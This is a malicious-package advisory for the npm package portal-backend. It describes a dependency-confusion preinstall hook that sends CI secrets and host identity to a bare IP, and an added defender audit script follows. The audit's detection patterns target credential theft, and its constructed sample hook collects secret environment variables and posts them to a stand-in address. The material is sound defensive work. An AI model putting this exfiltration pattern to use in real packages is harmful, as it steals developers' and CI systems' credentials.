
MAL-2026-5781

Malicious code in portal-backend (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (c5aca21d0e952f5ba313432cf5d47e41f185d19e65d894a005cce20be90d4985)

On `npm install`, the package's `preinstall` hook executes `postinstall.js`, which enumerates `process.env` and filters keys matching a broad credential-shaped regex (key|secret|token|pass|private|ssh|deploy|auth|api|rpc|wallet|sentry|docker|graph|slack|host), then bundles those values together with `os.hostname()`, `os.userInfo().username`, `process.cwd()`, and npm registry config into a JSON payload and POSTs it via `https.request` to `185.130.46.35:8443/collect` — a bare IP with no relation to any publisher domain. The source even self-identifies the behavior in a comment ("Exfil CI environment variables on install"). The package itself is hollow: `index.js` is `module.exports = {}`, the description is the generic "Internal package," and the version is `999.0.0` — the canonical dependency-confusion shape designed to outrank a private registry's `portal-backend` and have misconfigured installers fetch this public copy instead. Installing this package on any developer or CI machine immediately ships that machine's CI secrets, deploy tokens, SSH/registry credentials, and host identity to the attacker.
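As an added defender-side example (not part of this advisory, the scanner, or the package), the following audit flags the indicators described above in an in-memory view of a package: an install lifecycle hook, `process.env` enumeration with a credential-shaped regex, host-identity reads, an outbound request to a bare IP, an inflated version, a hollow entry point and the placeholder description. The sample package, its hook text and its RFC 5737 documentation IP are constructed; the hook text is only scanned, never executed.

```javascript
// Added example (not part of this advisory or the package): a defender-side audit that
// flags the indicators described above in an npm package. Input is an in-memory
// {manifest, files} object so it runs offline; a real run would read node_modules/<pkg>.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall'];
const CHECKS = [ // [label, regex applied to the hook script's source text]
  ['enumerates process.env', /process\.env/],
  ['filters env keys with a credential-shaped regex', /(key|secret|token|pass)\|(key|secret|token|pass|private|ssh)/i],
  ['makes an outbound HTTP(S) request', /\bhttps?\.request\(|\bfetch\(/],
  ['reads host identity (hostname/userInfo/cwd)', /os\.hostname\(|os\.userInfo\(|process\.cwd\(/],
  ['targets a bare IP address', /\b\d{1,3}(?:\.\d{1,3}){3}\b/],
];

function auditPackage({ manifest, files }) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (!scripts[hook]) continue;
    findings.push(`lifecycle hook "${hook}": ${scripts[hook]}`);
    // Resolve "node <file>.js" to a file shipped in the package and scan its text.
    const m = scripts[hook].match(/node\s+(\S+\.js)/);
    const src = m && files[m[1]];
    if (!src) continue;
    for (const [label, re] of CHECKS) if (re.test(src)) findings.push(`${m[1]} ${label}`);
  }
  // Dependency-confusion shape: inflated major version, hollow entry point, placeholder description.
  if (/^\d{3,}\.\d+\.\d+$/.test(manifest.version || '')) findings.push(`inflated version ${manifest.version}`);
  if (/^\s*module\.exports\s*=\s*\{\s*\};?\s*$/.test(files['index.js'] || '')) findings.push('hollow index.js');
  if (/^internal package$/i.test((manifest.description || '').trim())) findings.push('generic "Internal package" description');
  return findings;
}

// Constructed sample mirroring the advisory's description: the hook text is only scanned,
// never executed, and the address is an RFC 5737 documentation IP, not the one in the report.
const SAMPLE_SUSPICIOUS = {
  manifest: { name: 'portal-backend', version: '999.0.0', description: 'Internal package',
              scripts: { preinstall: 'node postinstall.js' } },
  files: {
    'index.js': 'module.exports = {};',
    'postinstall.js': [
      "const os = require('os'); const https = require('https');",
      'const picked = Object.keys(process.env).filter(k => /key|secret|token|pass/i.test(k));',
      'const meta = { host: os.hostname(), user: os.userInfo().username, cwd: process.cwd() };',
      "https.request({ host: '203.0.113.10', port: 8443, path: '/collect', method: 'POST' });",
    ].join('\n'),
  },
};
const SAMPLE_BENIGN = { manifest: { name: 'pad-left', version: '1.2.3', description: 'pads strings',
  scripts: { test: 'node test.js' } }, files: { 'index.js': 'module.exports = (s, n) => s.padStart(n);' } };

console.log(auditPackage(SAMPLE_SUSPICIOUS), auditPackage(SAMPLE_BENIGN));
```

The suspicious sample yields nine findings and the benign one none; a CI gate can fail the install when any lifecycle-hook finding is paired with an outbound request.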


Affected packages

npm / portal-backend

No fixed version published yet for portal-backend (npm). Pin to a known-safe version or switch to an alternative.
